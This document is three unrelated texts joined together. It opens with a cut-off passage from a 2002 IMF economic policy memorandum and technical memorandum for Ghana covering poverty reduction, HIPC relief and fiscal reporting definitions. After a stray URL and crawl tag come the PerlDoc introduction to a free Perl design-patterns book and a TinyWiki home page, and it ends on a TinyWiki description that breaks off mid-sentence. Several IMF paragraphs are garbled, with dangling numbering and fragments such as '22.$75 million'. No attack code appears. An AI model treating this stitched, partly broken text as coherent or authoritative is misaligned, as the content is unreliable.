Ghana's strategy to stimulate growth and private investment, and recommend concrete measures to enhance the policy environment for business investment in Ghana. 31. In this same vein, the government intends to reduce progressively the distortions inherent in Ghana's import tariff regime, which are an impediment to efficient private sector activity. A key step will be the elimination of the special import tax in the 2002 Budget, to be replaced later with anti-dumping measures that are consistent with WTO rules. D. The PRSP and HIPC Processes 32. The Ghana Poverty Reduction Strategy is now expected to be completed in early 2002. This extension of the original timetable was made in order to allow sufficient time for the completion of public consultations and development of a costed, prioritized policy program. The work on the strategy had already advanced sufficiently, however, to provide a framework for expenditure allocations in the 2002 Budget. A progress report on development of the GPRS to date and the remaining steps to completion has been prepared by the government and will be provided for consideration along with the HIPC decision point document and request for the PRGF disbursement. E. Good Governance and Fiscal Transparency 33. The government came into office with a pledge of zero-tolerance for all acts of corruption. A new anti-corruption strategy has been put in place, including Codes of Conduct for state officials, establishment of an Office of Accountability in the President's office and the Parliament, reform of the procurement system, and strengthening of anti-corruption agencies. As part of these efforts, the BOG has instituted new procedures to counter money laundering , whereby suspicious transactions are reviewed, and third-party transfers are checked against a list of suspected organizations. A new anti-money laundering bill is also under preparation. 34. The government notes that the Bank of Ghana has published new monetary data, correcting the underrecording of reserve money in the old series. It welcomes the request by the new Governor that this year's external audit of the central bank be conducted by auditors of international standing and experience, as a signal of the new management's determination to ensure full and accurate data for policymaking purposes. The auditors were appointed in December 2001, and the financial audit is expected to be completed by end-March 2002. In addition, the Bank of Ghana has been implementing a series of measures to improve the quality and reliability of monetary statistics, with technical assistance from the IMF, and this work will continue during 2002. The government is also committed to improving progressively the quality and coverage of Ghana's fiscal data, as a means to strengthen policymaking and accountability. In pursuit of this objective, the government will draw upon a Report on Standards and Codes in Fiscal Transparency planned for Ghana during the first half of 2002 to define an agenda for action, not only on fiscal data but also on budget processes and reporting. As an initial step, all MDAs will be required, from the beginning of 2002, to report to the Ministry of Finance expenditures financed from internally generated funds (such as user fees) and from direct donor funding. In addition, the government will seek the agreement of donors to channel all donor resources through government accounts (including committed donor accounts) at the Bank of Ghana, as well as all internally generated funds, where permitted by law. This will be particularly important for the effective tracking of poverty-related expenditure, to which Ghana is committed as a prospective recipient of HIPC relief. 35. For transparency reasons, the government has also made provision in the 2002 budget for transfers to the electricity and water companies to cover estimated price subsidies implied by the phased transition to full cost recovery in these sectors. This ensures that the cost of the subsidies and their financing are made explicit, rather than accumulating as ever-larger debts in the public utilities, and will also facilitate better targeting of subsidies in favor of the poor. The transfers will be made to ECG and GWCL on a quarterly basis, one month after the end of the quarter. The conversion of part of TOR's bank debt into government bonds, which will be serviced in 2002 from the budget, similarly serves to improve the transparency of the public finances, and to increase TOR's accountability for its future financial performance. F. Program Monitoring for 2002 36. Technical Memorandum of Understanding. The program will be monitored using the definitions, data sources, and frequency of monitoring set out in the accompanying Technical Memorandum of Understanding (TMU). The government will make available to Fund staff all core data on a timely basis, as specified in the TMU. 37. Prior Actions. The government will undertake a number of actions prior to the IMF Board meetings on the fourth and fifth reviews under the PRGF in order to ensure effective implementation of the economic strategy described in this memorandum (Table I.2). 38. Performance criteria. Table I.1 shows the quantitative performance criteria and benchmarks set for June 2002, with indicative benchmarks for March, September, and December 2002. Structural performance criteria and benchmarks with corresponding dates are identified in Table I. 39. Program review. A fifth review under the PRGF arrangement will be completed by November 30, 2002. In addition to the specified prior actions, this review will focus on implementation of (i) the public expenditure management and control system, (ii) the steps to develop a functioning interbank foreign exchange market, and (iii) measures to further strengthen monetary and fiscal data systems. Table I.2. Prior Actions, Structural Performance Criteria and Benchmarks Prior Actions for Fourth Review 1. Full implementation of the specific duties on petroleum (averaging 200 per liter). 2. Issuance to MDAs of disaggregated expenditure ceilings for the first quarter of 2002, consistent with the fiscal targets for 2002. 3. Provision of CAGD reports for the months of January-October 2001 on aggregate budget outcomes and MDAs' expenditure commitments and cash outlays, showing deviations from the established quarterly ceilings and any accumulated arrears. 4. Completion of audits at the MDA level of the full stock of domestic expenditure arrears for January-August 2001, and adoption of a strategy for their liquidation. 5. Cabinet approval of revenue measures with a combined yield in 2002 of not less than 115 billion, for implementation with the 2002 Budget. 6. Commencement of the external financial audit of the Bank of Ghana. Structural Performance Criteria 7. Elimination of the special import tax in the 2002 Budget, effective immediately (end-March 2002). 8. Announcement in the 2002 Budget of intent to create a full-service Large Taxpayers' Unit (LTU) for the 500 largest taxpayers, covering filing and payment, collection enforcement, and audit for all domestic tax liabilities, and adoption of a timetable for its establishment (end-June 2002). Structural Benchmarks 9. Issuance of disaggregated expenditure ceilings for each MDA for the second, third, and fourth quarters of 2002, consistent with the budget and cash flow forecasts (end-April 2002). 10. Production by CAGD of monthly reports for November 2001-March 2002 on aggregate budget outcomes and MDAs expenditure commitments and cash outlays, by function, with a maximum 6-week delay (end-May 2002). 11. Completion and publication of audit of 2000 non-road expenditure arrears (end-June 2002). Prior Actions for Fifth Review 12. Passage of a Budget for 2002 in line with the program framework described in this memorandum, and of revenue measures consistent with that Budget. 13. Publication by the PURC of its strategy for achieving full cost recovery in the public utilities, and implementation of automatic tariff adjustment formulae for electricity and water. 14. Completion of an external audit of the Bank of Ghana's financial accounts for 2001. Technical Memorandum of Understanding 1. This technical note contains definitions and adjuster mechanisms that are intended to clarify the measurement of items in Table I.1, Quantitative Performance Criteria, PRGF Arrangement, 2002, attached to the Memorandum of Economic and Financial Policies. Unless otherwise specified, all quantitative performance criteria and benchmarks will be evaluated in terms of cumulative flows from January 1, 2002. as well as all special funds (the Education Trust Fund, the Road Fund, the District Assembly Common Fund) and various subvented and other government agencies that are classified as government in the Bank of Ghana (BOG) Statement of Accounts. Public enterprises, including Cocoabod, are excluded from the definition of government. 4. Government domestic revenue comprises all tax and non-tax revenues of government (in domestic and foreign currency), excluding foreign grants and divestiture receipts. Revenue will be measured on a cash basis as the inflows to government uncommitted treasury collections accounts, plus positive balances on committed accounts of the government at the BOG. 5. Poverty-related expenditures refer to those expenditures identified in Table 6 of the Decision Point Document for the Enhanced Heavily Indebted Poor Countries Initiative. The last three digits of the chart of accounts are to identify budget expenditures that are poverty-related and the sub-component which is financed by HIPC relief. 6. Net domestic financing of government is defined as the change in net credit to government by the banking system (i.e., the Bank of Ghana plus deposit money banks) plus the net change in holdings of treasury bills and other government securities by the nonbank sector, but excluding divestiture receipts, government liabilities assumed in the restructuring of the domestic debts of the Tema Oil Refinery, the Electricity Company of Ghana, the Volta River Authority, and the Ghana Water Company Limited, and/or recapitalization of the Bank of Ghana. Outstanding net credit to the government by the Bank of Ghana is comprised of the sum of claims on government (codes 401 and 50101-4) less government deposits (1101 and 1202 and the BOG open market operations account; as defined in the Template of the BOG Statement of Accounts provided to the IMF on January 24, 2002), including the HIPC account. Outstanding net credit by deposit money banks is comprised of DMB holdings of government securities at cash value, as reported by the BOG Treasury Department's Debt Registry, less government deposits reported by DMBs in their BSD2 report form (as defined in the template for reporting of DMBs provided to the IMF on January 24, 2002). For each test date, any adjustment by the BOG to the data reported by individual DMBs, on account of their misclassification of government or for other reasons, will be reported to the Fund. 7. The domestic primary balance is defined as the difference between government domestic revenue and noninterest government expenditure as reported by the CAGD (i.e., payment vouchers issued for expenditures on items 1-4), but excluding foreign-financed capital expenditure, for which data are reported by the Aid and Debt Management Unit and expenditures to be financed by HIPC relief (i.e., those paid out of the HIPC Account of the CAGD; see below). The measurement will be on a cash basis, with any positive (negative) discrepancy between the above- and below-the-line measure of the overall balance being added to (subtracted from) the measure of the domestic primary balance. 8. The program exchange rate for the purposes of this memorandum will be 7205 cedis per dollar. 9. Reserve money is defined as the sum of currency in circulation (BOG statement of accounts codes 901 plus 902), commercial banks' deposits at the Bank of Ghana in cedis (code 110201 excluding overdrafts, banks in liquidation, and blocked accounts) and private and other non-government demand deposits at the Bank of Ghana in cedis (excluding blocked accounts). It will be measured by the indicated stock at end of month. If any bank fails to meet its legal reserve requirement, currently 9 percent of bank deposits, then reserve money will be adjusted upward to the extent of any shortfall in compliance with that reserve requirement. 10. Net foreign assets are defined for program monitoring purposes and in the monetary survey as short and long term foreign assets minus liabilities of the Bank of Ghana which are contracted with non-residents. Short-term foreign assets include: gold (valued at the spot market rate for gold, US$/fine ounce, London), holdings of SDRs, reserves and investments in the IMF, foreign notes and travelers checks, foreign securities, positive balances with correspondent banks, and other positive short-term or time deposits. Short-term foreign liabilities include foreign currency liabilities contracted by the Bank of Ghana at original maturities of one year or less (including overdrafts), plus outstanding liabilities to the IMF. Long-term foreign assets and liabilities are comprised of assets (303), investments abroad (a subset of 60101), liabilities (1204), and bilateral agreements (305), all excluding swap deals receivable and payable with resident commercial banks. All values are to be converted to U.S. dollars at actual market exchange rates prevailing at the test date. 11. Net international reserves of the Bank of Ghana are defined for program monitoring purposes and in the balance of payments as short-term foreign assets of the Bank of Ghana, net of its short-term external liabilities. To the extent that short-term foreign assets are not fully convertible external assets readily available to and controlled by the Bank of Ghana (i.e., they are pledged or otherwise encumbered external assets, including, but not limited to, assets used as collateral or guarantees for third party liabilities) these will be excluded from the definition of NIR. Net international reserves are also defined to include net swap transactions (receivable less payable), minus positive foreign currency deposits by domestic non-government entities at the BOG (120501 and 120502). All values are to be converted to U.S. dollars at actual market exchange rates prevailing at the test date. 12. Net domestic assets of the Bank of Ghana are defined as the difference between reserve money and net foreign assets of the Bank of Ghana, converted from U.S. dollars to cedis at the program exchange rate. 13. The performance criterion on short-term external debt refers to the outstanding stock of external debt with original maturity of one year or less, including overdraft positions, owed or guaranteed by the government or the Bank of Ghana. 1 Data on the Bank of Ghana's short-term external debt are those reported from the statement of accounts template as short-term liabilities to non-resident commercial banks (1201 plus 301 overdrafts plus Crown Agent). The limit on short-term external debt will exclude US$23 million in overdrafts with correspondent banks which are in dispute, until such time as these assets are re-classified. 14. The performance criterion on nonconcessional medium- and long-term external debt refers to the contracting or guaranteeing of external debt with original maturity of more than one year by the government or Bank of Ghana. 2 Medium- and long-term debt will be reported by the Aid and Debt Management Unit of the Ministry of Finance and (as appropriate) the Bank of Ghana, measured in U.S. dollars at current exchange rates. 15. The stock of payment arrears in the road sector at the end of August 2001 is recognized to be 279.8 billion and is expected to be paid down according to the schedule in Table I.1. Performance will be measured by the outstanding stock measured in cedis at the end of each quarter. Any arrears in foreign currency will be converted into cedi at the actual exchange rate prevailing at the test date. other currencies into cedis will be made at the actual exchange rates at each test date. 16. External payment arrears occur when undisputed interest or amortization payments are not made within the terms of the debt contract. Bilateral and commercial debt service payments that are subject to the deferral agreed with the Paris Club on December 10, 2001, or the rescheduling associated with the provision of interim HIPC relief, are not considered external arrears for program purposes. This is a continuous criterion. 17. Official external program support is defined as grants and loans provided by foreign official entities that are received by the budget, excluding project grants and loans, and other exceptional financing. Amounts assumed in the program consistent with this definition are shown in the memorandum item entitled "external program support" of Table I.1. 18. Divestiture receipts are payments received by the government (in domestic and foreign currency) in connection with the sale of state assets. The programmed amounts consistent with this definition are shown in Table I.1. Divestiture receipts in foreign exchange are those recorded as such in the Bank of Ghana's Cash Flow. 19. The automatic adjustment formula for petroleum prices, which was implemented in June 2001 and will operate continuously during the program period, is defined to pass through to ex-refinery prices the net cedi cost of refined petroleum product imports to ensure full cost recovery at the Tema Oil Refinery (including financial charges, except charges on debt subject to assumption by the government in 2001). From March 2002, the formula will include a petroleum debt service charge, equal to 95 percent of any decline in oil import costs from the average level prevailing during November 27-December 26, 2001. Adjusters 20. Deviations in official external program support, external debt service payments, and divestiture receipts from the amounts programmed in Table I.1 will trigger adjusters for domestic financing of government, net domestic assets of the Bank of Ghana and net international reserves as indicated below. These and other adjusters as set out below will be measured cumulatively from the beginning of 2002. 21.. The adjustment to the ceiling on the NDA of the Bank of Ghana with respect to deviations in divestiture receipts will apply only to foreign exchange receipts. Both ceilings will be increased by 100 percent of any cumulative shortfall in official external program support or excess in external debt service, but will not be adjusted for a shortfall in divestiture receipts. The upward adjustment is capped at the equivalent of US$75 million, converted to cedis at actual exchange rates. 22.$75 million. Reporting of Fiscal Data 21. The Ministry of Finance will provide to IMF staff: a) Monthly data on central budget operations for revenues, expenditure and financing with a lag of no more than 6 weeks after the end of the month. b) Monthly reports showing the functional breakdown by Ministry, Department, and Agency of expenditure authorizations, payments vouchers issued, payment vouchers liquidated, and arrears with a lag of no more than 6 weeks after end of the month. These reports will also identify poverty-related and HIPC financed expenditures, as well as the inflows and disbursements from the HIPC account at the BOG. c) CAGD monthly reports on the profile of central government revenues and expenditure (payment voucher issued) with a lag of no more than 6 weeks after end of the month. d) Monthly reports prepared by the Ministry of Road and Highways on the stock of road arrears with a lag of no more than 4 weeks after the end of the month. e) Quarterly reports (from the Portfolio Management Unit) on the financial positions of Cocoabod, ECG, SSNIT, TOR and VRA, with a lag of no more than 8 weeks after end of the month. 22. The BOG will provide the IMF staff: a) Monthly summary tables reporting the government's position on BOG committed and uncommitted accounts as well as financing within 4 weeks of the end of the month. This table should be accompanied by the table showing the composition of other receipts and other expenditure. b) Monthly tables showing the composition of banking system and non-banking system net claims on government, within 4 weeks of the end of the month. c) Monthly tables showing the structure and holders of domestic government debt, within 4 weeks of the end-of the month. External Debt and Debt Service and HIPC Relief 23., and to the IMF staff on a monthly basis.. g) A HIPC account has been established at the BOG for the receipt and disbursement of HIPC relief. When each debt service payment falls due, the Government of Ghana (or the BOG for IMF repurchases) will transfer to the HIPC account that proportion of the amount due which, under the terms of the HIPC Initiative, does not have to be paid to the creditor. For debt owed by public enterprises under the HIPC Initiative, the Government of Ghana will transfer to the HIPC account the debt-relieved portion of the debt service payment if the enterprise fails to do so on the due date. ADMU will issue, in advance of the due date, a request for payment to the CAGD indicating the portions due to the creditor and the HIPC account. ADMU will prepare a monthly report indicating for the coming month (i) the total debt service due by creditor, (ii) the amount of HIPC relief on each transaction, as well as (iii) the debt service paid and the transfers to the HIPC account by creditor for the previous month. This report will be provided within 2 weeks of end-month to the CAGD and to the IMF.
http://www.imf.org/external/np/loi/2002/gha/01/index.htm
CC-MAIN-2016-30
en
refinedweb
I am having a problem selecting dates from a database at the office. I seem to be unable to select anything on the EDT switchover. I have tried various JDBC versions and it seems to be always wrong. below is my output followed by the code. I would expect to see this: 2012-03-11 02:24:00.0 2012-03-11 03:24:00.0 What I get ----------------------------- ojdbc14-10.1.0.2.0.jar 2012-03-11 01:24:00.0 2012-03-11 03:24:00.0 ojdbc6_g-11.2.0.2.0.jar 2012-03-11 03:24:00.0 2012-03-11 03:24:00.0 ojdbc6_g-11.2.0.3.jar 2012-03-11 03:24:00.0 2012-03-11 03:24:00.0 import java.sql.*; public class JDBCTest { public static void main(String[] args) throws SQLException { DriverManager.registerDriver(new oracle.jdbc.OracleDriver()); ResultSet bat = DriverManager. getConnection("--JDBCURL--", "username", "password"). prepareCall("select to_date('3/11/2012 02:24:00','mm/dd/yyyy HH:MI:SS') theDate from dual"). executeQuery(); bat.next(); System.out.println(bat.getTimestamp("theDate")); ResultSet man = DriverManager. getConnection("--JDBCURL-", "username", "password"). prepareCall("select to_date('3/11/2012 03:24:00','mm/dd/yyyy HH:MI:SS') theDate from dual"). executeQuery(); man.next(); System.out.println(man.getTimestamp("theDate")); } } Any ideas on what could be going wrong? What kind of stuff should I be looking at in the DB environment? Is this a potential bug I should file somewhere? Thanks
https://community.oracle.com/thread/2419602?tstart=225
CC-MAIN-2016-30
en
refinedweb
Tab. jQuery UI makes creating tabbed areas very easy, so the framework is based on that. But we are on our own as far as Next/Previous buttons. Fortunately, jQuery UI tabs do have a function-thing that can be called to switch tabs. We can bind it to text links to accomplish switching tabs: $('#my-text-link').click(function() { // bind click event to link $tabs.tabs('select', 2); // switch to third tab return false; }); But we want to do this (hopefully) as smart-ly as we can. So we want to: - Add the links dynamically to each panel. If a panel is added or removed, the Next/Previous buttons automatically adjust to the new flow. Plus, links won't be there awkwardly with JavaScript disabled - Make sure there is no "Previous" button on the first panel - Make sure there is no "Next" button on the last panel This is how I did it: $; }); }); I was implementing something like this on a client’s site today. This is a much better solution. Thanks! I use another version of tab-based content; but I really like this inclusion of previous / next. I wonder though… if there is a way to have the previous / next buttons instead take on the title of the tab they are navigating to. In terms of user-friendly navigation, that would be the most comprehensive option – users would know exactly where they were going using either the prev / next tab options, or the upper navigation. That would be a clever idea, I’ll look into that, I’m sure it’s possible. I like the idea of that Rob. I need a solution that allows me to have names for the tabs. Then It’s more like a walk through with semantic writing that a user can understand. After all who knows which information is associated with which #. It would avoid the: “Crap I messed up on the contact form… Uhh which number was it it again? click click click click.” Take a look at this demo in IE 7. The Next/Previous tabs are out of whack. Other than that thanks for the code! thanks for sharing Wouldn’t it be better to do this in php instead? Since its almost the same solution but better for screen readers and browsers that don’t use js? Less debugging too.. But otherwise a nifty solution if that is what your looking for, thanks Chris :) The tabs need JavaScript to work anyway though…. not working in IE7 I think you need to add .ui-tabs .ui-tabs-panel {overflow:auto} I think that will fix the bug. Not tested though so I have done some testing and I have found a few different ways to make it work. you can float the display left and add a width of 100%. The only problem is that you need to set a static height to get this to work. I also tried to put a div wrap around it and to create the need space didn’t work very well. then I tried to hack it by adding padding to the div that was wrapping the display that worked but made the space pretty large in FF. well I am done playing around with this and would love to hear how this prob gets fixed. it is probably a Little one line fix that I didn’t think to try well thanks as always Chris. I was playing with this in Firefox 3, very awesome, but it alternates between horizontal/vertical scrolls on and off, even if there is no content change between tabs. Otherwise it’s a grand tutorial! Thanks for this. Quick question, how would you add a fading animation to the content when the tabs change. There are plenty much better tab-based stuff: Great post, tabs are the most used web interface on the web these days. Thnx for sharing Thanks Chris! It’s nice effect Nice idea. If you want to use only two links outside of the tabs instead of adding the next & previous links in each tab you can also use $tabs.data(‘selected.tabs’); to retrieve the index of the currently selected tab, and use the ‘tabsselect’ event to enable / disable the links. This solutions makes sense… thanks for the idea!!! The solution is elegant indeed. Thank you for the post. i like this thank you I was hoping for a ExtJS style tab Problem is that hiding content like this is actually bad for user experience if one comes from a search engine searching for hidden content. I wrote a blog post about it a few months ago: A fundamental problem with Ajax websites and hiding content also you face an accesibility problem for people with javascript turned off unless you use the css preloaded technique CSS Preloaded Nice solution! My only recommendation is to declare the variables ‘i’, ‘next’ and ‘prev’ with var. Since those aren’t declared with var they’re put into the global namespace. Really thankful for this elegant solution. it will be pretty when you add images on each tab. thanks a lot , but can I increase the content width inside the tab. Moreover select is deprecated now. So we have to use “active “parameter for getting and setting active tab Here is JS part of the code: you should have “a href” tags to be added in your tabs div with “btnPrev” and “btnNext” Classes hello everybody i’m having a problem could you me sir? i put this ui-tabs inside of “spry tabbed panels” the 1st tab it words great but the others tabs have an error.. it is not working =( please help me thank you in advance Do you have a link or example? There are so many tabs, but I think the Jquery UI Tabs’s best for me. Thanks for your TUT How can I do it automatically for example every 5 seconds? Thanks Its is working fine. Its a lovely. I am loving it.
https://css-tricks.com/jquery-ui-tabs-with-nextprevious/
CC-MAIN-2016-30
en
refinedweb
sandman 0.9.8! Documentation ------------- `Sandman documentation <https: sandman.readthedocs.`__ ` its. Supported Databases ------------------- ``sandman``, by default, supports connections to the same set of databases as `SQLAlchemy <http:"">`__. As of this writing, that includes: - MySQL (MariaDB) - PostgreSQL - SQLite - Oracle - Microsoft SQL Server - Firebird - Drizzle - Sybase - IBM DB2 - SAP Sybase SQL Anywhere - MonetDB Authentication -------------- As of version 0.9.3, ``sandman`` fully supports HTTP Basic Authentication! See the documentation for more details.:: :alt: admin interface awesomesauce screenshot admin interface awesomesauce screenshot -------------- (If you want to disable the browser from opening automatically each time ``sandman`` starts, call ``activate`` with ``browser=False``) If you wanted to specify specific tables that ``sandman`` should make available, how do you do that? With this little ditty: .. code:: python from sandman.model import register, Model class Artist(Model): __tablename__ = 'Artist' class Album(Model): __tablename__ = 'Album' class Playlist(Model): __tablename__ = 'Playlist' register((Artist, Album, Playlist)) And if you wanted to add custom logic for an endpoint? Or change the endpoint name? Or change your top level json object') __top_level_json_name__ = 'Genres' environment <http: chinookdatabase.codeplex.`__ sample SQL database. Contact Me ---------- Questions or comments about ``sandman``? Hit me up at [email protected]. |Bitdeli Badge| Changelog ========= Version 0.9.8 ------------- - Support for the ``wheel`` distribution format.8.xml
https://pypi.python.org/pypi/sandman/0.9.8
CC-MAIN-2016-30
en
refinedweb
iSkeletonBone Struct ReferenceThe skeleton bone class. More... #include <imesh/skeleton.h> Inheritance diagram for iSkeletonBone: Detailed DescriptionThe skeleton bone class. Definition at line 60 of file skeleton.h. Member Function Documentation Find child bone by name. Find child bone index. Set child bone by index. Get number of children bones. Get skeleton factory. Set full transform of the bone. Get name of the bone. Get parent bone. Get skin bbox. Get transform of the bone. Get bone transform mode. Get update callback. Set name of the bone. Set parent bone. Set skin bbox (usefull for creating collider or ragdoll object). Set transform of the bone in parent's coordsys. Set bone transform mode. Set callback to the bone. By default there is callback that sets bone transform when updating. The documentation for this struct was generated from the following file: - imesh/skeleton.h Generated for Crystal Space 1.0.2 by doxygen 1.4.7
http://www.crystalspace3d.org/docs/online/api-1.0/structiSkeletonBone.html
CC-MAIN-2016-30
en
refinedweb
Catalyst - The Elegant MVC Web Application Framework See the Catalyst::Manual distribution for comprehensive documentation and tutorials. # Install Catalyst::Devel for helpers and other development tools # use the helper to create a new application catalyst.pl MyApp # add models, views, controllers script/myapp_create.pl model MyDatabase DBIC::Schema create=dynamic: Enables debug output. You can also force this setting from the system environment with CATALYST_DEBUG or <MYAPP>_DEBUG. The environment settings override the application, with <MYAPP>_DEBUG having the highest priority.. Specifies log level. Enables statistics collection and reporting. You can also force this setting from the system environment with CATALYST_STATS or <MYAPP>_STATS. The environment settings override the application, with <MYAPP>_STATS having the highest priority. e.g. use Catalyst qw/-Stats=1/, giving access to information about the current client request (including parameters, cookies, HTTP headers, etc.). See Catalyst::Request./MyApp::Model::DBIC::Foo do_stuff/); $c->forward('MyApp::View::TT'); Note that forward implies an <eval { }> around the call (actually execute does), thus de-fatalizing all 'dies' within the called action. If you want die to propagate you need to do something like: $c->forward('foo'); die $c->error if $c->error; Or make sure to always return true values from your actions and write your code like this: $c->forward('foo') || return; The same as forward, but doesn't return to the previous action when processing is finished. When called with no arguments it escapes the processing chain entirely.); Gets a Catalyst::Controller instance by name. $c->controller('Foo')->do_stuff; If the name is omitted, will return the controller for the dispatched action.. Returns the available names which can be passed to $c->controller. Returns the available names which can be passed to $c->model Returns the available names which can be passed to $c->view Gets a component object by name. This method is not recommended, unless you want to get a specific component by full class. $c->controller, $c->model, and $c->view should be used instead.Is and with $c->namespace for relative URIs, then returns a normalized URI object. If any args are passed, they are added at the end of the path. If the last argument to uri_for is a hash reference, it is assumed to contain GET parameter key/value pairs, which will be appended to the URI in standard fashion. Instead of $path, you can also optionally pass a $action object which will be resolved to a path using $c->dispatcher->uri_for_action; if the first element of @args is an arrayref it is treated as a list of captures to be passed to uri_for_action. Returns the Catalyst welcome HTML page. These methods are not meant to be used by end users.. See Catalyst::Dispatcher. Prepares message body. Prepares a chunk of data before sending it to HTTP::Body. See Catalyst::Engine.. Warning: If you use read(), Catalyst will not process the body, so you will not be able to access POST parameters or file uploads via $c->request. You must handle all body parsing yourself. Starts the engine. Sets an action in a given namespace. Sets up actions for a component. Sets up components. Specify a setup_components config option to pass additional options directly to Module::Pluggable. To add additional search paths, specify a key named search_extra as an array reference. Items in the array beginning with :: will have the application class name prepended to them. Sets up dispatcher. Sets up engine. Sets up the home directory. Sets up log. Sets up plugins. Sets up timing statistics class.')) { ... } Returns an arrayref of the internal execution stack (actions that are currently executing). Returns or sets the stats (timing statistics) class. Returns 1 when stats collection is enabled. Stats collection is enabled when the -Stats options is set, debug is on or when the <MYAPP>_STATS environment variable is set. Note that this is a static method, not an accessor and should be overloaded by declaring "sub use_stats { 1 }" in your MyApp.pm, not by calling $c->use_stats(1). Carl Franks Christian Hansen Christopher Hicks Dan Sully Danijel Milicevic David Kamholz David Naughton Drew Taylor Sebastian Willert.
http://search.cpan.org/~mramberg/Catalyst-Runtime-5.7012/lib/Catalyst.pm
crawl-002
en
refinedweb
Object::PerlDesignPatterns - Perl architecture for structuring and refactoring large programs lynx perldesignpatterns.html perldoc Object::PerlDesignPatterns Documentation: Ideas for keeping programs fun to hack on even after they grow large. Object, lambda, hybrid structures, Perl specific methods of refactoring, object tricks, anti-patterns, non-structural recurring code patterns. PerlDesignPatterns is a free book sporting: Ideas for keeping programs fun to hack on even after they grow large. Object, lambda, hybrid structures, Perl specific methods of refactoring, object tricks, anti-patterns, non-structural recurring code patterns. Feel free to jump right in and make corrections, suggestions, ask questions, play editor, or just rant. Start in to learn about the TinyWiki software, make a page for yourself, play with editing that, perhaps make a link from the GuestLog to your page. The markup language is ASCII based - it couldn't be any easier. This document is a snapshot of the current state of the Wiki, automatically compiled from hundreds of individual sections by a Perl script. To cause my poor old server to prepare an up-to-the-minute HTML version of this document, go to. My text hasn't been proofread or spellchecked, with few exceptions. My code hasn't been tested by other people, and has only been tested by myself in a few cases. Since this project is (atleast partially) out of my hands, there is no firm point at which it's finished: the scope is indefinate. Because of this, parts of the document will always be in rough shape, contain inconsistencies, and so on. The PerlDoc version is compiled by podparser.pl, at, from hundreds of little text files. These text files use TinyWiki's markup. This simple ASCII format translates well to HTML. Things are lost in the translation to PerlDoc, still. Also, the pod2html that comes with Perl doesn't like to create forward links. The HTML translator loses the loading two underscores on meta-identifiers such as underscore-underscore-PACKAGE-underscore-underscore, and the PerlDoc parser probably does too. I cannot find the way to escape ?'s in POD link tags so that pod2html won't mangle them. Scott Walters - [email protected] PerlDesignPatterns Scott Walters - [email protected] "PerlDesignPatterns" in PerlDesignPatterns is a free on-line book and forum. For information about this project and links to download the entire book, see "HomePage" in HomePage, or just click - Downloading is highly recommended unless you're contributing to the project. Wget users - fetch "TinyWiki" in TinyWiki:download.cgi instead, and see "HomePage" in HomePage for more info. Novices, intermediate programmers: "Object Nuts and Bolts" is for you. Scroll down. Introduction Object Adapter Design Patterns Experts and advanced programmers: start here. Object State Patterns Object Creational Patterns Object Structure Patterns Object, Lambda Hybrid Patterns Relational Data Patterns Non-Object Patterns Application Features Web: General: Anti-Patterns Refactoring Concepts Object Nuts and Bolts Object novices: start here. Appendices Other Concepts and Blurbs, Or As Of Yet Unclassified Meta All content on this server is copyright 2002, 2003 by "ScottWalters" in ScottWalters, unless otherwise noted. Content credited otherwise is copyright its original author and has been generously made available by them under the same terms as the rest of the project, the "GnuFreeDocumentationLicense" in GnuFreeDocumentationLicense. Member of "CategoryBook" in CategoryBook. <img src=""> hits since Wed Oct 9 00:20:05 PDT 2002 $Id: "PerlDesignPatterns" in PerlDesignPatterns,v 1.225 2003/06/21 00:30:04 httpd Exp $ External Pages Linking to This Page - this is generated automatically - thanks to everyone linking here: Welcome to "TinyWiki" in TinyWiki, the "PerlDesignPatterns" in PerlDesignPatterns repository! Here, CPAN's Object::PerlDesignPatterns ( PerlDesignPatterns) is crafted by you and me. "PerlDesignPatterns" in PerlDesignPatterns is a free online book, forum, and documentation project at. Quick start: Browse or download . News Download PerlDesignPatterns TinyWiki PerlDesignPatterns Development and Forum Browsing the Wiki confuses mere mortals. Grab instead for casual reading. Also Also Wik "We are now the Knights who say ... Wiki wiki wiki wiki, bih-kang, zoop-boing, zowenzum" - I've been dying to say that ;) - Kurt quoting What in the Heck? There is no master site map: this site is itself a web. Some recommeneded starting points are: "PerlDesignPatterns" in PerlDesignPatterns,,, "CategoryBook" in CategoryBook,,,, "PerlPatternsResources" in PerlPatternsResources. Why are all the words of all of the links run together? Because thats how you make links! Words written this way get turned into links. Linking to an unknown page creates a new page. See "TinyWiki" in TinyWiki for a jumpstart. started this madness with his original at. Feel free to edit pages to make corrections, improvements, editorial comments, ask questions, and so on. Someone will see your changes in and answer your questions or touch up your work. Wikis exist to discuss all topics: see for a few others. This site is a tool for collaboration on the "PerlDesignPatterns" in PerlDesignPatterns project. Discussion of Wiki technology, Perl, OO programming in general, language theory, are on topic. You're encouraged to make a page named after yourself (for example, "ScottWalters" in ScottWalters is mine) and link to it off the "GuestLog" in GuestLog - your need not be on topic. Off topic text not on your is likely to be moved there or pruned, not because we don't think it's funny, merely because focus is important. See. Have Fun! - ScottWalters $Id: "HomePage" in HomePage,v 1.156 2003/06/21 07:57:24 httpd Exp $ Pages Linking to This Page: What? A style user-editable online area: a knock off of's at, written in under a hundred lines of Perl. The code is available: See below. In a nutshell, click the graphic on the top of the screen to get back to the "HomePage" in HomePage from anywhere. Feel free to edit pages. Play around in the if you want to experiment, then make a "GuestLog" in GuestLog entry. To create a new page: See and for more information on Wiki and other Wiki codebases, or keep reading for more about "TinyWiki" in TinyWiki. has links to historic versions and versions unburdoned by all of my local parser rules. How? How did I write a Wiki in under 100 lines? Not exactly on par with, but I wrote compact code, did the, and most of all, didn't make any arrangements for modularity, resigning myself to refactor constantly. You could say "TinyWiki" in TinyWiki is a study in constant refactoring.. This version saves documents to CVS, but does tolerate not having it. See Features below to learn what is available in the way of formatting text, then play with editing in. has a very nice quick reference for "TinyWiki" in TinyWiki formatting. Why? Why another Wiki? Because the free Wiki clone I had been using was 4,000 lines long, which is about 3,900 too many. It took ages to load. It was tied to the goofy .dbm format so I couldn't easily write scripts to import/export. Wanted something easy to hack on. See. Who? "ScottWalters" in ScottWalters. Just another perl hacker. See for more. Where? Each script is capable of spitting out its own source code. Think of it as human-assisted-propagation. Want to practise software husbandry? Be advised - in the spirit of tininess, important things are missing. There is currently no HTML filtering, so users could create obnoxious etc. has different text processing rules - I didn't find 's intuitive. Sorry. Pages can not be completely deleted - that would interfere with fetching previous versions, and a philosophy exists that web pages should never just vanish, but should instead be replaced with a page linking to where the content moved. In the spirit of, I firmly hold true the notion that it is more important to be able to hack features on than have every conceiveable feature simply because every feature isn't conceivable and attempts to conceive of them litter the code with thousands of attempts almost all of which miss the mark. To the degree that it's possible, new features are implemented as separate scripts. I want to push the limit of what is possible. With the 